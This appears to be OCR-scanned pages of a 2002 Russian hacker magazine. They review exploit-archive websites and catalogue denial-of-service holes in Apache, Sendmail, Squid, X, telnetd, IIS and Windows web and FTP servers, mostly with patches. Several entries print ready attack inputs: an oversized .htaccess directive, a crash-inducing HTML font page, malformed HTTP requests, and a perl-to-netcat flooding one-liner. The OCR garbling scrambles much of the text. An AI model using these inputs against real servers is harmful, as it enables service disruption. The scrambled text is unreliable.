щена эта статья. 

Чтобы ты лучше ориентировался в 
представленном материале, мы 
придумали систему сравнения 
веб-узлов. Так что смотри на наши 
оценки (по пятибалльной шкале) и 
выбирай ресурсы по душе. 


Внимание! Ввиду того, что многие 
сайты не указывают размер своей 
базы, мы вынуждены оценивать ко- 
личество эксплоитов также по пя- 
тибалльной шкале. Известный сайт 
www.rootshell.com в обзор не во- 
шел, так как в последнее время он 
вообще не отвечает на запросы. 
Может тебе повезет болыше? 


уязвимости в этой софтине, тулзы, 
позволяющие их использовать, и 
исходники эксплоитов. Они, кста- 
ти, почти все написаны на Си и со- 
держат комментарии. 

Теперь перейдем к бонусам. Их 
много. И это кайф. Во-первых, 
сайт содержит прямые ссылки на 
руководства по написанию кон- 
кретных эксплоитов (например, 
по Оо5-атакам и переполнению 
буфера), утилит (то- 
же не безобидных :)) 
и отысканию уязви- 
мостей в различном 
софте. Руководства 
для новичков тоже 
присутствуют, хотя 
их не так много. Во- 
вторых, на сайте есть 
куча ссылок на софт 
(всяческие  тулзы), 
помогающий в напи- 
сании эксплоитов. 
(Как он может по- 
мочь? Не знаю. Но так 
написано! ;)) 
В-третьих, помимо ссылочной на- 
вигации по темам (ее мы как раз и 
рассмотрели), есть обычное поис- 
ковое окошко. Вбивай в него клю- 
чевые слова, и результат не заста- 
вит себя ждать. 

Согласись, фич у этого ресурса до- 
фига. Основная - руководства, ма- 
нуалы и туториалы по написанию 
самых чумовых эксплоитов. 
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Величина базы: 9 
Удобство навигации: 9 
Частота обновлений: 9 
Бонусы: 9 


Если хоть раз попадешь на этот ре- 
сурс, то поймешь, что лучшего в се- 
ти найти вряд ли удастся. Что тако- 
го крутого в этом веб-узле? Во- 
первых, так же, как и Viod.ru, он 
полностью на русском языке. Во- 
вторых, он посвящен безопасности 
в целом, и на нем ты можешь найти 
огромное количество статей, ману- 
алов и руководств. В-третьих, не- 
плохой форум (хотя \1од’овскому 
он, конечно, уступает). А что мо- 
жет предложить база эксплоитов 
этого сайта? Около 2,5 тысяч экс- 
плоитов, каждодневное обновле- 
ние, эксплоиты на Си, CGI, Perl, про- 
комментированные исходники, 
офигенная система навигации и 
поиска. 

На последнем пункте мы остано- 
вимся подробнее. Выбрав на основ- 
ной странице сайта раздел «Экс- 
плоиты», ты попадешь Ha Mary, где 
все эксплоиты уже отсортированы 
по различным признакам: ОСям, си- 
стемным сервисам, шелкоду. Также 
есть возможность просмотреть от- 
дельно Оо5-эксплоиты. Это оч-чень 
приятно, так как до этого ни один 
из русскоязычных сайтов так про- 
фессионально не подходил к орга- 
низации базы уязвимостей. Но это 
еще не все! Тут же представлен раз- 
дел, называющийся «Papers». В нем 
лежит куча руководств и пособий 
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Величина базы: 3 
Удобство навигации: 4 
Частота обновлений: 2 
Бонусы 2 


Это страница содержит инфу по 
сверхпопулярному сканеру пор- 
тов - ММАР. Казалось бы, причем 
здесь сканер портов? Да ни при 
чем. Просто один из разделов сай- 
та называется Exploit World. Мы не 
могли обойти его вниманием :). 
Итак, залезаем внутрь. Перед нами 
все эксплоиты, отсортированные 
по ОСям. Также есть раздел, где все 
эксплоиты лежат без разбора. 


по написанию своих эксплоитов. 
Не пропусти! 

С навигацией вроде бы разобра- 
лись, теперь переходим к поиску. 
Вообще, придумать нормальную 
маску для поиска эксплоитов не- 
просто. Организаторы же этого ре- 
сурса решили проблему в лоб, что 
оказалось достаточно эффектив- 
но. Чтобы найти нужный тебе экс- 
плоит, ты должен заполнить (как 
можно подробнее) поля в поиско- 
вике (его окошки расположены 
прямо внизу страницы): OC (ду- 
маю, без вопросов), название (на- 
пример, firewall или Red Hat - этот 
пункт является уточнением пре- 
дыдущего, в котором ты выбирал, к 
примеру, Linux, а не Linux Red 
Hat), версия OC, сервис (тип уязви- 
мости, используемой эксплоитом), 
тип эксплоита (например, DoS, 
local, remote...). Самое приятное, 
что почти к каждому пункту суще- 
ствует выпадающий список, позво- 
ляющий формировать запрос про- 
стым щелчком мыши. Таким обра- 
зом, можно сэкономить туеву хучу 
времени :). 

Мощной фичей является обновля- 
емость - при заходе в базу экспло- 
итов перед тобой предстанет спи- 
сок из примерно десяти последних 
эксплоитов. И не исключено, что 
новейший из них будет датирован 
сегодняшним числом. 

Однако жизнь не такая безоблач- 
ная, а пятачок вовсе не розовый... 
У этого узла есть один минус (не- 
большой, правда, но все же). Чтобы 


Именно по этой странице легко 
определить размер данного архи- 
ва. Он достаточно мал, думаю, там 
меныше пятидесяти эксплоитов. 
Зато каждый из них имеет подроб- 
ные комментарии и шапку. В шап- 
ке (она представляет собой табли- 
цу) указывается полная и даже 
сверхполная инфа: дата написа- 
ния эксплоита, его тип (основной 
принцип действия), к какой он 
проге или OC, его автор. Частота 
обновления этого архива нулевая. 
Т.е. последнее обновление было в 
1998 году. Хреново, да? А бонусы 
вообще отсутствуют. 


получить доступ к базе эксплои- 
тов, необходимо зарегистриро- 
ваться. Что может быть проще? 
Кое-что может, это тебе He mail.ru 
дырявый, глюканутый и быстрый 
на расправу. После внесения своих 
данных придется ждать несколько 
дней, пока тебе пришлют логин и 
пароль на мыло (его ты, естествен- 
но, тоже сообщаешь). Мне присла- 
ли через три дня. Один 

чел в сети, правда, кри- 

Yall, что OH так и не 

дождался своего паро- 

ля (при этом он поли- 

вал весь сайт и отнюдь 

не соком 97). По-мое- 

му, это все фигня - про- 

сто надо региться по- 

скорому, чтобы потом 

(когда припрет) полу- 

чить полноценный до- 

ступ сразу. 

Этот минус легко по- 

бороть. Во-первых, 

сразу после первого 

ввода логина и пароля 

сайт разместит на твоем винте ку- 
кис, И больше ничего вводить не 
придется. Между прочим, очень 
приятно видеть личное приветст- 
вие при открытии главной страни- 
цы архива с эксплоитами ;). Во- 
вторых, если тебе реально невтер- 
пеж, можешь написать мне на лич- 
ную мыльницу и попросить mou 
собственный пароль. Я же не обле- 
зу, если ты скушаешь пару БЕС- 
ПЛАТНЫХ эксплоитов на завтрак 
за мой счет! 


Однако не стоит сразу 
отбрасывать этот сайт 
в сторону, он может 
пригодиться для начи- 
нающих, так как им 
еще не важна актуаль- 
ность эксплоита в на- 
ше время. На первое 
место выходят понят- 
ность и прозрачность 
алгоритма. А тут ком- 
ментарии будут как 
нельзя кстати. 


р и ee ь 
a ee 
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WWW.HACKERS.COM 


Величина базы: 4 
Удобство навигации: 4 
Частота обновлений: 3 
Бонусы: 3 


Мощный ресурс. Его раздел Exploits 
и есть гавань обетованная :). 0с- 
новной девиз данной базы экспло- 
итов: «Защити себя от эксплоитов, 
узнав, как они работают». И это аб- 
солютно верное утверждение! 

Попав в базу, ты увидишь тридцат- 
ку самых-самых (по мнению авто- 
ров сайта) эксплоитов. А наверху - 
красивую менюшку, позволяющую 
искать эксплоиты по ОСям. Щелк- 
нув, например, на пункт Винда, ты 
наткнешься штук на тридцать экс- 


WWwW.VOID.RU 


Величина базы: 5 
Удобство навигации: 3 
Частота обновлений: 9 
Бонусы: 5 


Огромное количество (мегатонны) 
статей и эксплоитов. Как только 
попадешь на сайт, перед твоими 
глазами предстанет целый ряд по- 
следних статей и уязвимостей. 
Только выбирай! Тебе этого мало? 
Тогда жми на «архив проекта» и 
попадешь в реально здоровую базу 


WWW.SECURITYFOCUS.COM 


Величина базы: 5 
Удобство навигации: 2 
Частота обновлений: 9 
Бонусы: 2 


Один из самых профессиональных 
ресурсов. Имеет огромную базу 
эксплоитов и обновляется каждый 
день. Очень мощно и очень круто! 
Однако навигация в нем - черт го- 
лову сломит :(. Чтобы найти хоть 
что-то напоминающее эксплоит, 
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плоитов, датированных 2001 го- 
дом. Отсюда делаем вывод - обнов- 
ления у данного ресурса страда- 
ют... даи размер базы не велик. Но 
должно же быть в этом архиве 
хоть что-то хорошее! И оно есть. 
Это просто очень хорошие ком- 
ментарии по всему исходному ко- 
ду эксплоитов. Думаю, это пораду- 
ет начинающих хацкеров. Также 
приятен ассортимент эксплоитов: 
в базе представлены С6]-эксплои- 
ты и другие не Сишные исходни- 
ки. Это тоже не последний аргу- 
мент. Ну и в самом конце - просто 
приятный дизайн сайта. Ничего не 
режет глаз, не давит на уши и не 
лезет в нос. Изучай и наслаждайся. 


все тех же эксплоитов и статей. 
Единственная проблема так это с 
сортировкой всей этой тучи ин- 
формации - придется искать само- 
му... зато супер бонус данного ре- 
сурса - русский язык. Везде. В ста- 
тьях и эксплоитах. Ну, может и не 
везде... кое-где и Си встречается :- 
). Еще одним плюсом данного ре- 
сурса является очень мощный фо- 
рум, на котором ты всегда смо- 
жешь узнать мнения людей, шаря- 
щих в компьютерной секьюрити. 


надо зайти в securityfocus online и 
уже там выбирать, что хочешь. 
Этот ресурс нельзя рекомендовать 
начинающим хакерам, так как он 
почти не содержит пояснений, а 
вся инфа представлена очень 
кратко и на техническом англий- 
ском. Так что имей в виду. 

Бонусы отсутствуют, зато более 
мощные обновления ты нигде не 
найдешь! 
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WWW.PULHAS.ORG 
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Раздел Exploits этого сайта перенесет тебя в 
неплохую базу эксплоитов. Ее основные плю- 
сы - частое обновление и большой размер. К 
сожалению, английский язык и отсутствие раз- 
витой системы поиска не позволяет этому ре- 
сурсу выдвинуться в лидеры. Хотя внимания 
он достоин, безусловно. 


WWW.TLSECURITY.NET 


Это достаточно мощный ресурс с приятным 
пользовательским интерфейсом. Помимо экс- 
плоитов содержит огромную гору информацию 
по вирусописанию, хаканью, кряканью и еще 
бог знает чему. Очень подробно представлена 
инфа по троянам (Backdoor&NetBus). В общем, 
видно, что эксплоиты - не конек сего ресурса. 
Но посетить его стоит. 


WWW.WIRETRIP.NET 


Неплохой ресурс с убогой системой навигации. 


На основной странице выбери раздел «library» 
и попадешь в водоворот статей, уязвимостей и 
руководств. Причем это все свалено в такую 
кучу, что даже винегрет отдыхает. Если пове- 
3eT, найдешь полезную инфу (она там есть, без 
сомнения). В общем, будет время, посети. 
Пройдешь мимо, потеряешь немного :). 


WWW.GIPSHACK.RU 


Раздел «Эксплоиты» этого сайта пополняется 
не очень часто. Отсюда небольшой размер базы 
и слабая оперативность обновлений. Навига- 
ция хромает на одну ногу, так как ты можеш 
искать эксплоиты только по двум категориям: 
Windows и Linux. При этом придется выбирать 
эксплоиты из большого числа статей по ком- 
пьютерной безопасности. На что уйдет уйма 
времени. Весь ресурс можно охарактеризовать 
одним словом: «SUXX!» 
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Удобство навигации: 
Частота обновлений: 
Бонусы: 


Очень симпатичный ресурс - подробные ком- 
ментарии, обновления каждый день, большая 
база. Навигация хромает, так как отсутствует 
развитая система поиска. Сразу видно: хотя о 
базе эксплоитов заботятся, она является от- 
нюдь не приоритетным направлением сайта. 
Помимо рассмотренного архива данный веб- 
узел содержит море другой инфы по уязвимос- 
тям и хак-событиям веба. Русский язык повсе- 
местно делает этот ресурс очень полезным. 


Величина базы: 
Удобство навигации: 
Частота обновлений: 
Бонусы: 


На этой паге представлено просто много экс- 
плоитов (в основном на Си). Заходи и выбирай. 
К каждому эксплоиту дана инфа (по миниму- 
му). В принципе ресурс не претендует на зва- 
ние супер-пупер, так что будешь проходить ми- 
мо - проходи ;-). 


Величина базы: 
Удобство навигации: 
Частота обновлений: 
Бонусы: 


Хороший архив эксплоитов можно найти и на 
этом сайте. Обновления, правда, происходят 
где-то раз в один-два месяца. Зато неплохая си- 
стема навигации позволяет быстро найти экс- 
плоит по типу уязвимости или дате его появле- 
ния. Заходи, не пожалеешь. 


Величина базы: 
Удобство навигации: 
Частота обновлений: 
Бонусы: 


Не блеск, но все же... Интерфейс в стиле «фтп» 
позволяет быстро найти нужный эксплоит. 
Выбор неплохой. А вот оперативность обнов- 
лений подкачала - по-видимому, этот ресурс 
забросили около года назад. Так что вся инфа 
датирована 2001 годом. Отсюда вывод: свежач- 
ка здесь не найти, а вот антиквариата доста- 
точно... 
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WWW.SECURITEAM.COM 


Величина базы: 5 
Удобство навигации: 9 
Частота обновлений: 4 
Бонусы: 4 


Мощный англоязычный ресурс. Обновляется 
где-то раз в два дня. По сравнению с другими 
монстрами это долго. Зато здесь представлены 
мануалы и статьи по отысканию различных 
уязвимостей и написанию эксплоитов. Разви- 
тая система навигации позволяет быстро найти 
нужный эксплоит: все они с самого начала 
сгруппированы по различным категориям, ко- 
личество которых может удовлетворить даже 
гурмана. Так что не пропусти. 


HTTP:/OLIVER.EFRI.HR/~CRV/SECURITY 
/BUGS/LIST.HTML 


Величина базы: ~ 
Удобство навигации: = 
Частота обновлений: 2 
Бонусы: 2 


На этой странице можно скачать архив уязви- 
мостей (в юниксовском формате), последнее 
обновление которого датировано 9 сентября 
2001 года. Рекомендуется тем, кому некуда де- 
вать Интернет, и совсем чокнутым. 


WWW.USSRBACK.COM, 
wWww.OUTPOSTS.COM/EXPLOITS/EXPLOITS.HTML, 
HTTP:/PHREAK.COM/HTML/EXPLOITS.SHTML 


Величина базы: 9 
Удобство навигации: 9 
Частота обновлений: - 
Бонусы: 4 


Все эти ресурсы имеют много общего (хотя аб- 
солютно независимы друг от друга): много ин- 
фы (эксплоитов и руководств), все эксплоиты 
хорошо отсортированы и совсем непонятно, 
как часто это все обновляется. Выбирай любой 
из них и юзай. 


027 


| 2) в fh © 
| cover story 


‘we —— eT EEeane 


в ee aDm. 
bn еше A } МР чтит 

i з dah A ae анны ИЛ 4 

ий || i ee К о ARIGHYS Be bia К работе в Е 

Ss В eo ‘система. Но это еще He означает, что OHA 

м самая безгпючная... Hem, самая G6eseniouHaA 

: = (остапьные еще хуже), но не абсопютно. 

: безгпючная :). Есть cpegu be! emokos ио 


эВ 


1 
| 


august/08/2002 


028 


Апачка — самый популярный web-cepBep для nix, практически 
стандарт. Посмотрим, какие 0о5-дыры в нем были найдены за 
его долгую историю. 


Название: DoS при отсутствии директории логов. 

Дырявая версия: 1.3.11, 1.3.12, 1.3.14, 1.3.17, 1.3.18, 1.3.19, 
ISAO) MSs 

Описалово: Апачка впадает в состояние DoS, если не может 
найти свою директорию логов. Достаточно ее удалить, чтоб на- 
крылся весь меБ-сервер. 

‚ Защита: Сделать владельцем папки логов группу рута, чтоб ле- 
вые юзеры не могли ее удалить. 


Название: bar c .htaccess. 

Дырявая версия: 1.3.6-1.3.22 с mod_ssl 2.3.11-2.8.10. 
Описалово: Еще одна дырища в Apache: если в фале .htaccess 
содержание директивы DATE_LOCALE превысит 10000 байт, 
сервак повиснет. А как известно, любые юзеры, пользующие- 
ся хостингом, могут создавать .htaccess для своих сайтов. По- 
лучается, что ничего не мешает любому юзеру хостинга задо- 
сить весь меБ-сервер. 

Пример: Записать в файл .htaccess следующее: 

SetEnv DATE_LOCALE “1234567890...” (и так 10000 байт). 
Защита: Проапгрейдить до патченной версии mod_ssl. 


Самый популярный 5МТР-сервер под nix. И самый дырявый... 


Название: Лок на файлы сендмейла. 

Дырявая версия: 8.10, 8.10.1, 8.10.2, 8.11, 8.11.1, 8.11.2, 
8.111318. 1122 

Описалово: При помощи функций flock() и fentl() можно по- 
лучить исключительную блокировку даже на такие файлы, 
на которые у пользователя имеются только права на чтение. 
Если таким образом поступить с файлами sendmail a, ему 
будет DoS. 

Защита: Апгрейд до версии 8.12.4. 


Прокси-сервер. Один из наиболее часто юзаемых под никсами. 


Название: Ошибка обработки сжатых DNS-oTBeTOB. 

Дырявая версия: 2.0-2.4. 

Описалово: Сквид падает в DoS, когда хацкерский О№5-сервак 
шлет ему сжатые О№-ответы. 

Защита: Как всегда — апгрейд до пропатченной версии. 


Название: Корявые $ММР-сообщения. 

Дырявая версия: 2.0-2.4. 

Описалово: У сквида возникает утечка памяти, когда он по- 
лучает кривые $№МР-сообщения. Если таких сообщений по- 
слать много, проксик сожрет всю доступную ему память и 
уйдет в DoS. 

Защита: Отключить поддержку SNMP. 
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Lroot@localhost поаН]# sendmail do 
dosdosdosdoscdosdosdosdosdosdosdosd 
SqOScOSCOSh0S ао eae we eceed 
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Сеанс Редактирование Bug Настро 


Lroot@localhost поаН]# sendmail do 
dosdosdosdosdosdosdosdosdosdosdosd 
eddosdosdosdos pees eeeeeeeeeeaeeeee 


Se ттт 
SD 
+ УЕ 


+ УЕ 


dosdosdosdosdosdosdosdosdosdosdosd 
edosdosdosdosdotdostd,.e4¢eseeeeeee4 
rere ee ee ere Cl ale Пан 


Сеанс Редактирование Выд Настро 


Lroot@localhost поаН]# ftp 

Еее» open 12/,0,0,1 

Fiet connect: Connection refused 
Fie? 


Название: Глюк с кэшированием ЕТР-директорий. 

Дырявая версия: 2.2-2.4. 

Описалово: Сквид коряво кэширует ЕТР-директории, поэтому 
послав специально сформированный запрос через проксик, 
хацкер может привести его к DoS (буквально за ручку ;)). 
Защита: Апгрейд. 

Название: Конфликты в доступе. 

Дырявая версия: 2.4 STABLE1, 2.4 STABLE2. 

Описалово: Если коннект с каким-нибудь хостом разрешен че- 
рез http_access, но запрещен через miss_proxy, а это хост пы- 
тается приконнектиться к проксику, то сквиду будет DoS. 
Защита: Опять апгрейд. 


Файл Помощь 


Елассы пользователей | Каталоги | 


[] Анонимный [ 
[] Гость 
[] Реальный 


йппег8: 


Файл Помощь 
| К. аталогн | Безопасность | Сообщ 
Не скачиваемые Число неправилён 


[] Разрешить SIT 


Разрешить следи 


ieee 
[eho 


Весьма распространенный ЕТР-сервак. 


Название: Жор памяти. 

Дырявая версия: 2.5.0. 

Описалово: В этих версиях фтпшника имеется баг, благодаря 
которому удаленный юзер может заставить Wu-Ftp отжирать 
большие куски памяти, что рано или поздно приведет к DoS. 
Защита: Апргрейд до версии 2.6.0. 


Оконная сисема для юниксов. Самая популярная — конкурен- 
тов просто нет! 


Название: Кривая обработка огромных шрифтов 
Дырявая версия: 4.0-4.0.3. 


august/08/2002 


_ f ‘= 

Описалово: У XFree86 проблемы с бол 

ли какое-нибудь приложение передает ему описание ог- 

ромного шрифта, сервак виснет. 

Пример: Надо создать примерно такой html-cain: 

<html> 

<style type="text/css”> 

=1— 

| exp { font-size: 1666666px; } 

| —> 

</style> 

<body class="exp”> 

exploit 

</body></html> 

Когда юзер с уязвимой версий X закачает эту штуку себе 

браузером (и тот передаст ее иксам), его Х Window System 
уйдет в 005. 


i al 
ьшими шрифтами. Ес- 


Защита: Апгрейд до версии 4.2.0. 


Название: DoS для xfs. 
Дырявая версия: 4.0.1-1. 


Описалово: xfs - иксовый фонт-сервер. Его глючит и 
005` ит, если просто прислать ему в порт кучу случайного 
мусора. 


Защита: 
Апгрейд до более новых версий. 


Демон телнета. 


Название: in.telnetd ошибка проверки входных данных. 
Дырявая версия: telnetd RedHat Linux 4.2, RedHat Linux 5.2 
(i386), RedHat Linux 6.0 (i386). 

Описалово: Фишка в том, что когда телнет-клиент коннек- 
тится к in.telnetd, происходит попытка подобрать совмести- 
мый тип терминала. Делается это через переменную окру- 
жения ТЕКМ. Так вот, если хакер заранее (до соединения) 


установит специальным образом своему телнет-клиенту пе- | 


ременную TERM, in.telnetd уйдет в DoS. 


Защита: Патчи тут: 
ftp://ftp.redhat.com/pub/redhat/updates/4.2/i1386/NetK 
it-B-0.09-11.1386.rpm - RedHat Linux 4.2; 
ftp://ftp.redhat.com/pub/redhat/updates/5.2/1386/tel- 
net-0.10-28.5.2.1386.rpm - RedHat Linux 5.2; 
ftp://ftp.redhat.com/pub/redhat/updates/6.0/i1386/tel- 
net-0.10-29.1386.rpm - RedHat Linux 6.0. 


Название: DoS для telnetd 
Дырявая версия: telnetd FreeBSD FreeBSD 3.0-4.1. 

Описалово: Демон телнета, поставляемый с этими ферсия- 
ми фришк, содержит бак, который позволяет удаленному 
пользователю вызвать 005 для всей системы. Фишка в том, 
что через переменную ТЕВМСАР телнет-клиент может при- 
казать телнет-серверу начать поиск по файловой системе 
{егтсар-файлов ({егтсар — terminal capability database, в 
файле /etc/termcap, например, хранится инфа о различных 
типах терминалов их возможностях). Соответственно, если 
запустить кучу таких процессов (поиск по файловой систе- 
ме), инициализировав много соединений с telnetd, можно 
привести систему в конечном итоге к 005. А еще фишка в 
том, что можно заставить telnetd шуршать по файловой си- 
стеме (отправив ему переменную ТЕКМСАР) еще до аутенти- 
фикации. 


Защита: 
Патч тут: ftp://ftp.freebsd.org/pub/FreeBSD/CERT/ 
patches/SA-00:69/telnetd.patch. 
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DoS ana WEB- CEPBEPA 

тение исходника А5Р-скрипта. 

Bara, присущая ранним версиям (3.0) виндового веб- 
сервера, состоит в прибавлении всего лишь одной то- 
чечки к имени файла, которая доставляет просто уй- 
му радости, разрешая скачать исходник А5Р-скрипта, 
в котором нерадивые админы могут хранить пароли. 

Автор баги: Lynn Kyle ([упп@КАТМС.СОМ) 

Найдена: 22 марта 1998 

Патч: Поставить более новую винду 


DoS атака, осуществляемая при помощи 
viewcode.asp (из backoffice). 

Заставить хост притормозить работу и отказать в обслужива- 
нии поможет следующая строчка: 
http://<nwmacepBepa>/whetever/viewcode.asp?source=///// 
TL////////<mMHoro-MHoro слешей>/// 

Автор: неизвестный герой 

Система: Microsoft BackOffice с файлом viewcode.asp 

Патч: удалить или переименовать файл viewcode.asp 


Глюк M 15, приводящий к DoS. 

Если послать строку более 8К на веб-сервер 115, тогда машин- 
ка упадет, плавно склеив ласты... 

Автор: Todd Fast, Andrea Агсапдей (arcangeli@mbox.queen.it) 

Системы: любая непатченная система M$ IIS (до версии 4.0), под HT 
Патч: поставить сервис пак или обновить систему до версии 
4.0 


Microsoft Internet Information Server abra- 
cadabra.bat Bar, 

доступный в одной из древнейших версий веб-сервера OT мел- 
кософта. 

abracadabra.{bat,cmd} исполняется как Сб1-приложение и поз- 
воляет выполнять разные команды на удаленном серваке 115. 
Автор: www.omna.com 

Системы: Microsoft IIS http server v.1.0, 2.06 

Патч: поставить более новые винды :) или по адресу 
ftp://ftp.microsoft.com/bussys/iis/iis-public/ 


Переполнение Bymape ASP.DLL и другие 

мелкие Баги... : 

Эксплоит для реализации этой атаки лежит по адресу: 

http://www.xakep.ru/post/15144/exploit.txt (правда, бага тес- 

тировалась :) на китайской версии винтукей) и реализует 

ошибку в ASP.DLL, приводящую к DoS'y. Эксплоит выполняет 

1 переполнение буфера и открывает 1111 порт, связывая его с 
_ cmd.exe. В некоторых случаях система выдаст ошибку 

occured.anyhow, это диалоговое окно должно быть закрыто Ha 

сервере, в противном случае эксплоит работать не будет. 

Автор: CHINANSL Security Team 

Системы: 115 4.0-5.0 

Патч: сходить на мелкософт и скачать последний сервиспак 


на нь сист sss BbIHb, 
ты знал, откуд 


ых FEET eT ЕЕ 


Е В этои статье я хочу поведать тебе про Dos-y: язвимости 


ALOBC, чтобы 
ждать опасность... 


Уязвимость в ISAPI фильтре ISM.DLL 


Эта ошибка позволяет удаленному атакующему нарушать работу 
меБ-службы с возможностью выполнения произвольного кода. 
Ism.dll обрабатывает файлы с расширением .htr, недостаток в мо- 
дуле позволяет атакующему частично или полностью нарушать ра- 
ботоспособность сайта. Теоретически возможно использовать 
данную уязвимость для выполнения произвольного кода с права- 
ми IWAM_COMPUTERNAME. Проблема связана с обработкой пара- 
метра модулей: /foo.htr? <buffer> =x “. Результат зависит от внут- 
реннего состояния распределенной памяти IIS. В случае IIS 5.0- 
5.1 служба автоматически перезапустится. Неоднократное ис- 
пользование этой уязвимости потребует перезагрузки сервера. 
Пример: 

POST /EEYE.htr HTTP/1.1 

Host: Oday.big5.com 

Transfer-Encoding: chunked 

20 

XXXXXXXXXXXXXXAXXXXAKKXXEEYEZOOZ 

0 

[enter][enter] 
Автор: инфа взята с сайта ввв.хакер.ру 
Системы: 4.0-5.1 


DoS против И5+РР2002 


Ошибка во внутреннем взаимодействии объектов позволяет 
злонамеренному пользователю разрушать процесс IIS 4.0, 5.0 
и5.1. Frontpage содержит обработчик URL (URL parser) для ди- 
намических компонентов (shtml.exe/dll). Если хакер запраши- 
вает /_vti_bin/shtml.exe, где URL с динамическим содержани- 
ем заменен длинным URL, подмодуль отфильтрует URL и воз- 
вратит нулевое значение к меБ-службе URL parser. Строка сим- 
волов размером 25 Кб, состоящая из символов с А$С1-кодом 
300(?), вызовет нарушение доступа, и сервис Inetinfo.exe бу- 
дет закрыт. В случае 11$ 5.0-5.1 процесс будет автоматически 
перезапущен. В IIS 4.0 потребуется ручная перезагрузка. 
Автор: Дейв Auten от @stake и Питер Грундл от KPMG 
Система: Microsoft Internet Information Server 4.0,5.0, 5.1 с FP2002 


Dos против Microsoft IIS 5.0 


Microsoft IIS 5.0 склонен к DoS, если ему послать специально 
обработанный уродливый HTTP Get заголовок. Если к IIS 5.0 
послан обработанный HTTP Get запрос, который содержит 
фальсифицированное и чрезмерное поле “Content-length”, 
сервер ведет себя необычно. Сервер сохраняет подключение 
открытым, однако не отвечает на него. Это может использо- 
ваться для DoS атаки против Web сервера. 
Пример: 

GET /testfile НТТР/1.1 

Accept: image/gif, image/x-xbitmap, image/jpeg, 

image/pjpeg, 

application/vnd.ms-excel, application/vnd.ms-powerpoint, 

application/msword, */* 

Accept-Language: en-us 

Accept-Encoding: gzip, deflate 

User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; 


a 


Windows NT 5.0) 
Host: 192.168.0.10 
Connection: Keep-Alive 
Content-Length: 5300643 
Authorization: Basic 

Эксплоит: http://www.securitylab.ru/?ID=27321 
Автор: Ivan Hernandez, Georgi Guninski 
Патч: пока нету 


DoS против OmniHTTPd 


OmniHTTPd - универсальный \еБ-сервер для Windows 9x и NT. 
При попытке обработать длинный НТТР-запрос (более 4096 
символов) сервер перестает отвечать на дальнейшие запросы 
и зависает. Пример: perl -e ‘print “HEAD / “.”а”х4.096 .”\n\n” | 
nc 127.0.0.1 80 

Эта атака срабатывает и с другими типами запросов - ‘get’, 
‘post’ ит.п. 

Автор: Martin J. Muench 

Cuctema: OmniHTTPd v2.09 

Патч: “Nothing published yet” - вот что HanucaHo y них Ha сайте... 


DoS против Macromedia Sitespring сервер 


Уязвимость обнаружена в Macromedia Sitespring 1.2.0(277.1), 
которая использует Sybase runtime engine v7.0.2.1480. Посы- 
лая уродливый запрос к базе данных (1077 x chr(2) + \r\n\r\n 
к 2500 порту), работа служб Sitespring web и Sybase runtime 
engine аварийно завершится. Если послать движку базы дан- 
ных такую штучку “1077 x chr(2) + \r\n\r\n” - то глюк базы, 
влекущий за собой останов веб-сервера, просто обеспечен. 
Автор: Peter Grundl (рагип9@Кртд.аК) 

Система: Macromedia Sitespring Server 

Патч: искать тут 
http://www.macromedia.com/software/sitespring/ 


р та 
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DoS против Advanced Web Server 
Professional 
Advanced Web Server Professional 
(http://elaboration.8bit.co.uk)- Web-cepsep от GameCheats 
для Microsoft Windows. При попытке обработать уродливый 
НТТР-запрос, состоящий из одной CRLF, Web-cepBep зависнет 
с ошибкой в advserver.exe. Если эту операцию повторить 100 
раз, сервер перестанет принимать новые подключения. Уяз- 
вимость обнаружена в GameCheats Advanced Web Server 
Professional 1.0.3 0000. 
Автор: elab (http://elaboration.8bit.co.uk) 
Cuctema: GameCheats Advanced Web Server Professional 
1.0.3 0000 
Патч: как исправить, смотреть тут 
http://elaboration.8bit.co.uk/projects/texts/advisories/ 
AdvServer.DoS.txt 


DoS против Apache Tomcat 


Запросы (более 75), состоящие из большого количества нулевых 
символов, приводят к аварийному завершению работы Web- 
службы. Уязвимость затрагивает только Windows версию Tomcat. 
Автор: http://jakarta.apache.org 
Система: уязвимость обнаружена в 
Foundation Tomcat 4.0.3 

Патч: проапгрейдиться по адресу 
http://jakarta.apache.org/builds/jakarta-tomcat-4.0/ 
release/v4.1.3-beta/ 


Apache Software 


Переполнение уфера в Macromedia 
ColdFusion entail приводящее к DoS’y IIS 
Allaire Macromedia ColdFusion - сервер \МеБ-приложений для 
Microsoft Windows. Переполнение буфера обнаружено в 
ColdFusion МХ server, когда он используется вместе с Microsoft 


DoS ДЛЯ WIN i 


IIS. При получении уродливого НТТР-заголовка, превышающе- 
го 4096 байт, и если template filename больше 8092 байт, про- 
изойдет переполнение в модуле ‘jrun.dll’. Успешное использо- 
вание баги может приводить к зависанию IIS и возможному 
выполнению произвольного кода. 

Автор: Macromedia 

Система: уязвимость обнаружена в Macromedia ColdFusion 
Server МХ 

Патч: http://www.macromedia.com/security 


ры per 6 Apache 
1.3.24 для вин 

Переполнение буфера в Apache 1.3.24 обнаружено при обра- 
ботке некоторых типов записей в .htaccess файле. .htaccess 
файл с более 10000 байтами, назначенными переменной 
DATE_LOCALE, приведет к ошибке сегментации Web сервера. 
Уязвимость может использоваться для выполнения произволь- 
ного кода и для реализации 0о5’а. Пример: SetEnv 
DATE_LOCALE “X”, где X - строка более 12288 байт. Или экс- 
плойт можно забрать тут: http://securitylab.ru/?ID=31672 
Автор: Frank DENIS 

Cuctema: Apache Software Foundation Apache 1.3.24 Ha win32 
Патч: проапгрейдить апач до более новой версии 


Выполнение произвольного кода 
6 4D WebServer 


4D WebServer - клиент/сервер система управления базами дан- 
ных для Microsoft Windows и MacOS. 4D WebServer не в состоя- 
нии корректно обработать большой Http запрос. Http запрос 
большого размера может вызвать переполнение буфера с воз- 
можностью выполнения произвольного кода и полного зави- 
сона системы. 

Автор: Dumitru Vlad 

Cuctema: 4D WebServer 6.7.3 

Патч: вот слова автора дырки: “4D was contacted 20020606 but 
returned no reply” 


DoS ДЛЯ FTP-CEPBEPA 


DoS против TransSoft Broker FTP Server 


Transoft Broker (http://www.transsoft.com/broker.htm) - FTP- 
сервер для Windows-nnathopm. Передача команды cwd с по- 
следовательностью символов “....” приведет к зависанию Ftp- 
сервера, например: CWD.... 

Автор: пожелал остаться неизвестным 

Система: TransSoft Broker FTP Server 5.0 

Патч: He обнаружен... 


DoS в Ftp сервере T¥PSoft 


TYPSoft FTP server (www.typsoft.com) - маленький и эффектив- 
ный ЕТР-сервер для Windows, мало того, что позволяет просма- 
тривать содержимое произвольных директорий путем просто- 
го ввода команды [5 (пример: “$ ../../*.*” “ls 
